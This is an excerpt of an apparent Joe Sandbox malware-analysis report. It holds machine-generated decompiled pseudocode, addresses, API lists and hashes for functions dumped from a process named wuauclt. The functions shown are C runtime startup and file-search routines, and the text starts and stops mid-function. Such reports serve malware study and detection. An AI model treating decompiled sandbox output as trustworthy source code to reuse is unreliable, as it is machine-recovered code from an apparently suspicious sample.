										_t67 = 0;
										_t47 = 0;
										__eflags = _t33;
										if(_t33 != 0) {
											do {
												_t56 =  *((intOrPtr*)(_t72 + 4)) - 1;
												_t70 = (_t67 <<  *((intOrPtr*)(_t72 + 4)) - 1) + (_t67 <<  *((intOrPtr*)(_t72 + 4)) - 1);
												__eflags = _t70;
												do {
													_t41 = E00257F02(_t56, __eflags);
													__eflags = _t41 -  *(_t72 + 8);
												} while (__eflags > 0);
												_t67 = _t70 | _t41;
												_t53 = _v0;
												_t47 = (_t47 <<  *((intOrPtr*)(_t72 + 4)) - 0x00000001) + (_t47 <<  *((intOrPtr*)(_t72 + 4)) - 0x00000001) |  *(_t72 + 8);
												_t12 = _t53 - 1; // -1
												__eflags = _t47 - _t12;
											} while (_t47 < _t12);
										}
										_t34 = _t47;
										_t48 = _t34 % _t53;
										__eflags = _t67 / _v0 - _t34 / _t53;
										_t53 = _v0;
										if(__eflags >= 0) {
											goto L19;
										}
										break;
										L19:
										_t24 = _t53 - 1; // 0x254ffb
										_t33 = _t24;
										__eflags = _t48 - _t33;
									} while (_t48 != _t33);
									_t26 = _t67 % _t53;
									__eflags = _t26;
									return _t26;
								} else {
									_t3 = _t52 + 0x23; // 0x23
									_t45 = _t3 & 0xffffffe0;
									__eflags = _t45;
									 *(_t45 - 4) = _t52;
									return _t45;
								}
							}
						}
					}
				} else {
					L1:
					return _t27;
				}
			}























                                                0x002550a0
                                                0x002550a0
                                                0x002550a0
                                                0x002550a3
                                                0x002550a8
                                                0x002550ae
                                                0x002550b1
                                                0x002550ec
                                                0x00000000
                                                0x002550b3
                                                0x002550b3
                                                0x002550b8
                                                0x002550de
                                                0x002550e3
                                                0x002550e6
                                                0x002550e8
                                                0x00000000
                                                0x002550ea
                                                0x00000000
                                                0x002550ea
                                                0x002550ba
                                                0x002550ba
                                                0x002550ba
                                                0x002550bd
                                                0x002550bf
                                                0x002550f1
                                                0x002550f1
                                                0x00000000
                                                0x002550c1
                                                0x002550c7
                                                0x002550c9
                                                0x002550cc
                                                0x002550ce
                                                0x002550f6
                                                0x002550f6
                                                0x002550fb
                                                0x002550fb
                                                0x00255100
                                                0x00255101
                                                0x00255102
                                                0x00255103
                                                0x00255104
                                                0x00255105
                                                0x00255106
                                                0x00255107
                                                0x00255108
                                                0x00255109
                                                0x0025510a
                                                0x0025510b
                                                0x0025510c
                                                0x0025510d
                                                0x0025510e
                                                0x0025510f
                                                0x00255116
                                                0x00255117
                                                0x00255118
                                                0x0025511a
                                                0x0025511a
                                                0x0025511b
                                                0x0025511e
                                                0x00255120
                                                0x00255120
                                                0x00255122
                                                0x00255124
                                                0x00255126
                                                0x00255128
                                                0x0025512b
                                                0x0025512e
                                                0x0025512e
                                                0x00255130
                                                0x00255130
                                                0x00255135
                                                0x00255135
                                                0x0025513d
                                                0x00255142
                                                0x00255147
                                                0x0025514a
                                                0x0025514d
                                                0x0025514d
                                                0x00255128
                                                0x00255153
                                                0x00255159
                                                0x00255162
                                                0x00255164
                                                0x00255167
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00255169
                                                0x00255169
                                                0x00255169
                                                0x0025516c
                                                0x0025516c
                                                0x00255174
                                                0x00255174
                                                0x0025517c
                                                0x002550d0
                                                0x002550d0
                                                0x002550d3
                                                0x002550d3
                                                0x002550d6
                                                0x002550da
                                                0x002550da
                                                0x002550ce
                                                0x002550bf
                                                0x002550b8
                                                0x002550ab
                                                0x002550ab
                                                0x002550ab
                                                0x002550ab

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f7953424a9ec5fdeb2c14d626db20bc09a55e7a0c64c0f3b1c43eec529bc13a
                                                • Instruction ID: aacc533a2325c98070f2a341b06504db240d7bcea1d384f1ef6e1075f295ffd1
                                                • Opcode Fuzzy Hash: 9f7953424a9ec5fdeb2c14d626db20bc09a55e7a0c64c0f3b1c43eec529bc13a
                                                • Instruction Fuzzy Hash: D2F0AEB157471645DB18BB70946751E338C4D18367B100239BD25C61D1FB31DD7D899E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002572F6 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E002572F6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t4;
				void* _t6;
				void* _t13;
				void* _t15;
				void* _t25;
				void* _t27;
				void* _t28;

				_t30 = __edi;
				_t29 = __edx;
				_t25 = __ecx;
				_t24 = __ebx;
				_push(__esi);
				E0025C0BD(1);
				E0025CA8E(E00257921());
				_t4 = E0025CBE4();
				 *_t4 = E00257927();
				_t6 = E002576C8(__ebx, __edx, __edi, _t4, 1);
				_t37 = _t6;
				if(_t6 == 0) {
					L5:
					E00257993(_t29, _t30, 7);
					asm("int3");
					E0025795E();
					__eflags = 0;
					return 0;
				} else {
					asm("fclex");
					E00257B03();
					E0025786C(_t37, E00257B2E);
					_push(E0025791D());
					_t13 = E0025C464(_t25, __edx);
					_pop(_t27);
					if(_t13 != 0) {
						goto L5;
					} else {
						E0025792A(_t13);
						_t15 = E0025797B();
						_t39 = _t15;
						if(_t15 != 0) {
							_t15 = E0025C161(E00257927);
							_pop(_t27);
						}
						E00257957(E00257957(_t15));
						E00257936(_t29, _t30, _t39);
						E0025CB4D(_t27, _t29, E00257927());
						_pop(_t28);
						L0025C73C(_t24, _t28);
						E00257927();
						return 0;
					}
				}
			}










                                                0x002572f6
                                                0x002572f6
                                                0x002572f6
                                                0x002572f6
                                                0x002572f6
                                                0x002572f9
                                                0x00257304
                                                0x00257309
                                                0x00257317
                                                0x00257319
                                                0x00257322
                                                0x00257324
                                                0x00257389
                                                0x0025738b
                                                0x00257390
                                                0x00257391
                                                0x00257396
                                                0x00257398
                                                0x00257326
                                                0x00257326
                                                0x00257328
                                                0x00257332
                                                0x0025733c
                                                0x0025733d
                                                0x00257343
                                                0x00257346
                                                0x00000000
                                                0x00257348
                                                0x00257348
                                                0x0025734d
                                                0x00257352
                                                0x00257354
                                                0x0025735b
                                                0x00257360
                                                0x00257360
                                                0x00257366
                                                0x0025736b
                                                0x00257376
                                                0x0025737b
                                                0x0025737c
                                                0x00257381
                                                0x00257388
                                                0x00257388
                                                0x00257346

                                                APIs
                                                • ___scrt_initialize_onexit_tables.LIBCMT ref: 00257319
                                                • __RTC_Initialize.LIBCMT ref: 00257328
                                                  • Part of subcall function 0025786C: __onexit.LIBCMT ref: 00257872
                                                  • Part of subcall function 0025792A: InitializeSListHead.KERNEL32(00273860,0025734D), ref: 0025792F
                                                • ___scrt_fastfail.LIBCMT ref: 0025738B
                                                • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 00257391
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_initialize_onexit_tables__onexit
                                                • String ID:
                                                • API String ID: 3692885319-0
                                                • Opcode ID: 7ee4178655372b50bae5cb01c5ccaf58518812ca75d2be45c9f4c20cfcf725cd
                                                • Instruction ID: b619f07ec7c95afe189a2403e9ae88c8c8c36fead077fe25ee01f7370d9dc95b
                                                • Opcode Fuzzy Hash: 7ee4178655372b50bae5cb01c5ccaf58518812ca75d2be45c9f4c20cfcf725cd
                                                • Instruction Fuzzy Hash: 42F0E7559FD31268DE2037F1780BA5E11484F20B27F240855BD44A6083FD79C47C9CBE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025F70F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E0025F70F(void* __ebx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __esi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				void* _t216;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E0025C40F(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E002648FB(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0025BA7F();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E0025D3BF(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E002648FB(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E0025FADE(_a12, __eflags, _t213);
													E0025D2F4(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E002648FB(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0025BA7F();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x271004; // 0x80aab37c
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00264950(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E002596C0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E002644B0(_t155, _t203, _t195 + _t179 * 4, _t131 - _t179, 4, E0025F6F7);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													_pop(_t216);
													__eflags = _v16 ^ _t222;
													return E00257097(_v16 ^ _t222, _t216);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E0025D2F4(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00264910( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0025FAB9( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E0025D495();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0025BA52();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}























































































                                                0x0025f714
                                                0x0025f717
                                                0x0025f71d
                                                0x0025f735
                                                0x0025f738
                                                0x0025f73c
                                                0x0025f73e
                                                0x0025f740
                                                0x0025f742
                                                0x0025f745
                                                0x0025f748
                                                0x0025f74b
                                                0x0025f74d
                                                0x0025f7a5
                                                0x0025f7a5
                                                0x0025f7ab
                                                0x0025f7ad
                                                0x0025f7b8
                                                0x0025f7bc
                                                0x0025f7be
                                                0x0025f7c1
                                                0x0025f7c5
                                                0x0025f7c5
                                                0x0025f7c7
                                                0x0025f7c9
                                                0x0025f7cb
                                                0x0025f7cd
                                                0x0025f7cd
                                                0x0025f7cf
                                                0x0025f7d2
                                                0x0025f7d5
                                                0x0025f7d5
                                                0x0025f7d7
                                                0x0025f7d8
                                                0x0025f7d8
                                                0x0025f7e3
                                                0x0025f7e5
                                                0x0025f7e8
                                                0x0025f7e9
                                                0x0025f7ec
                                                0x0025f7ec
                                                0x0025f7f0
                                                0x0025f7f3
                                                0x0025f7f6
                                                0x0025f7f6
                                                0x0025f804
                                                0x0025f806
                                                0x0025f809
                                                0x0025f80b
                                                0x0025f815
                                                0x0025f818
                                                0x0025f81b
                                                0x0025f81d
                                                0x0025f820
                                                0x0025f822
                                                0x0025f872
                                                0x0025f875
                                                0x0025f875
                                                0x0025f877
                                                0x00000000
                                                0x0025f824
                                                0x0025f826
                                                0x0025f826
                                                0x0025f828
                                                0x0025f82b
                                                0x0025f82b
                                                0x0025f830
                                                0x0025f833
                                                0x0025f833
                                                0x0025f835
                                                0x0025f836
                                                0x0025f836
                                                0x0025f83a
                                                0x0025f83d
                                                0x0025f83d
                                                0x0025f840
                                                0x0025f843
                                                0x0025f850
                                                0x0025f855
                                                0x0025f858
                                                0x0025f85a
                                                0x0025f894
                                                0x0025f895
                                                0x0025f896
                                                0x0025f897
                                                0x0025f898
                                                0x0025f899
                                                0x0025f89e
                                                0x0025f8a2
                                                0x0025f8a4
                                                0x0025f8a5
                                                0x0025f8a8
                                                0x0025f8a8
                                                0x0025f8ab
                                                0x0025f8ab
                                                0x0025f8ad
                                                0x0025f8ae
                                                0x0025f8ae
                                                0x0025f8b7
                                                0x0025f8b8
                                                0x0025f8bb
                                                0x0025f8be
                                                0x0025f8c1
                                                0x0025f8c3
                                                0x0025f8ca
                                                0x0025f8cc
                                                0x0025f8cf
                                                0x0025f8d9
                                                0x0025f8dc
                                                0x0025f8dd
                                                0x0025f8df
                                                0x0025f8f3
                                                0x0025f8f3
                                                0x0025f8f6
                                                0x0025f900
                                                0x0025f905
                                                0x0025f908
                                                0x0025f90a
                                                0x00000000
                                                0x0025f90c
                                                0x0025f910
                                                0x0025f919
                                                0x0025f91f
                                                0x00000000
                                                0x0025f922
                                                0x0025f8e1
                                                0x0025f8e1
                                                0x0025f8e7
                                                0x0025f8ec
                                                0x0025f8ef
                                                0x0025f8f1
                                                0x0025f928
                                                0x0025f92a
                                                0x0025f92b
                                                0x0025f92c
                                                0x0025f92d
                                                0x0025f92e
                                                0x0025f92f
                                                0x0025f934
                                                0x0025f937
                                                0x0025f938
                                                0x0025f93a
                                                0x0025f940
                                                0x0025f947
                                                0x0025f94a
                                                0x0025f94d
                                                0x0025f94e
                                                0x0025f951
                                                0x0025f952
                                                0x0025f955
                                                0x0025f956
                                                0x0025f977
                                                0x0025f977
                                                0x0025f979
                                                0x00000000
                                                0x00000000
                                                0x0025f95e
                                                0x0025f960
                                                0x0025f962
                                                0x0025f964
                                                0x0025f966
                                                0x0025f968
                                                0x0025f96a
                                                0x0025f975
                                                0x00000000
                                                0x0025f975
                                                0x0025f96a
                                                0x0025f966
                                                0x00000000
                                                0x0025f962
                                                0x0025f97b
                                                0x0025f97d
                                                0x0025f980
                                                0x0025f999
                                                0x0025f999
                                                0x0025f99b
                                                0x0025f99e
                                                0x0025f9ae
                                                0x0025f9b0
                                                0x0025f9b0
                                                0x0025f9a0
                                                0x0025f9a0
                                                0x0025f9a3
                                                0x00000000
                                                0x0025f9a5
                                                0x0025f9a5
                                                0x0025f9a8
                                                0x00000000
                                                0x0025f9aa
                                                0x0025f9aa
                                                0x0025f9aa
                                                0x0025f9a8
                                                0x0025f9a3
                                                0x0025f9be
                                                0x0025f9c2
                                                0x0025f9d0
                                                0x0025f9d5
                                                0x0025f9ea
                                                0x0025f9ec
                                                0x0025f9f2
                                                0x0025f9f5
                                                0x0025fa27
                                                0x0025fa27
                                                0x0025fa2c
                                                0x0025fa32
                                                0x0025fa32
                                                0x0025fa39
                                                0x0025fa53
                                                0x0025fa53
                                                0x0025fa54
                                                0x0025fa5a
                                                0x0025fa60
                                                0x0025fa61
                                                0x0025fa62
                                                0x0025fa67
                                                0x0025fa6a
                                                0x0025fa6c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025fa3b
                                                0x0025fa3b
                                                0x0025fa41
                                                0x0025fa43
                                                0x00000000
                                                0x0025fa45
                                                0x0025fa45
                                                0x0025fa48
                                                0x00000000
                                                0x0025fa4a
                                                0x0025fa4a
                                                0x0025fa51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025fa51
                                                0x0025fa48
                                                0x0025fa43
                                                0x00000000
                                                0x0025fa6e
                                                0x0025fa76
                                                0x0025fa7c
                                                0x0025fa7e
                                                0x0025fa7e
                                                0x0025fa86
                                                0x0025fa8b
                                                0x0025fa93
                                                0x0025fa96
                                                0x0025fa98
                                                0x0025faac
                                                0x0025fab1
                                                0x0025f9f7
                                                0x0025f9f7
                                                0x0025f9f8
                                                0x0025f9f9
                                                0x0025f9fa
                                                0x0025f9fb
                                                0x0025fa03
                                                0x0025fa03
                                                0x0025fa03
                                                0x0025fa05
                                                0x0025fa08
                                                0x0025fa0b
                                                0x0025fa0b
                                                0x0025f982
                                                0x0025f985
                                                0x0025f987
                                                0x00000000
                                                0x0025f989
                                                0x0025f989
                                                0x0025f98c
                                                0x0025f98d
                                                0x0025f98e
                                                0x0025f98f
                                                0x0025f994
                                                0x0025f987
                                                0x0025fa13
                                                0x0025fa17
                                                0x0025fa18
                                                0x0025fa23
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025f8f1
                                                0x0025f8c5
                                                0x0025f8c7
                                                0x0025f923
                                                0x0025f927
                                                0x0025f927
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025f85c
                                                0x0025f85f
                                                0x0025f862
                                                0x0025f865
                                                0x0025f868
                                                0x0025f86b
                                                0x0025f86e
                                                0x0025f86e
                                                0x00000000
                                                0x0025f82b
                                                0x0025f80d
                                                0x0025f80d
                                                0x0025f879
                                                0x0025f87b
                                                0x00000000
                                                0x0025f880
                                                0x0025f74f
                                                0x0025f74f
                                                0x0025f752
                                                0x0025f75b
                                                0x0025f75e
                                                0x0025f765
                                                0x0025f767
                                                0x0025f780
                                                0x0025f781
                                                0x0025f782
                                                0x0025f784
                                                0x0025f789
                                                0x0025f769
                                                0x0025f769
                                                0x0025f76c
                                                0x0025f76d
                                                0x0025f76f
                                                0x0025f771
                                                0x0025f773
                                                0x0025f778
                                                0x0025f778
                                                0x0025f78c
                                                0x0025f78e
                                                0x0025f790
                                                0x00000000
                                                0x00000000
                                                0x0025f796
                                                0x0025f799
                                                0x0025f79b
                                                0x0025f79d
                                                0x00000000
                                                0x0025f79f
                                                0x0025f79f
                                                0x0025f7a2
                                                0x00000000
                                                0x0025f7a2
                                                0x00000000
                                                0x0025f79d
                                                0x0025f881
                                                0x0025f884
                                                0x0025f889
                                                0x00000000
                                                0x0025f88c
                                                0x0025f71f
                                                0x0025f71f
                                                0x0025f726
                                                0x0025f727
                                                0x0025f729
                                                0x0025f72e
                                                0x0025f88d
                                                0x0025f891
                                                0x0025f891
                                                0x00000000

                                                APIs
                                                • _free.LIBCMT ref: 0025F87B
                                                  • Part of subcall function 0025BA7F: IsProcessorFeaturePresent.KERNEL32(00000017,0025BA51,00000016,0025D38C,0000002C,0026FBC8,00261574,?,?,?,0025BA5E,00000000,00000000,00000000,00000000,00000000), ref: 0025BA81
                                                  • Part of subcall function 0025BA7F: GetCurrentProcess.KERNEL32(C0000417,0025D38C,00000016,0025E9E9), ref: 0025BAA3
                                                  • Part of subcall function 0025BA7F: TerminateProcess.KERNEL32(00000000), ref: 0025BAAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                • String ID: *?$.
                                                • API String ID: 2667617558-3972193922
                                                • Opcode ID: a9fdad73963641235026ba844b344ef56bcf6c357ac4210e1c0350d6e0d593ca
                                                • Instruction ID: 22b80e6c1f0cec415b618d8e165e03e7012aad0520ae0ca6025899d7f68aaea3
                                                • Opcode Fuzzy Hash: a9fdad73963641235026ba844b344ef56bcf6c357ac4210e1c0350d6e0d593ca
                                                • Instruction Fuzzy Hash: 3751DE71E1020AAFDF14DFA8C981AADFBB5EF48311F24817AE854E7340E731AE158B54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025FF7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E0025FF7E(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __ebp;
				char _t31;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E0025E966(__ebx, __ecx, __edx);
				E0026009D(__ebx, __ecx, __edx, __edi);
				_t31 = E0025FD12(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__edi);
				_t70 = E0025D32E(_t57, 0x220);
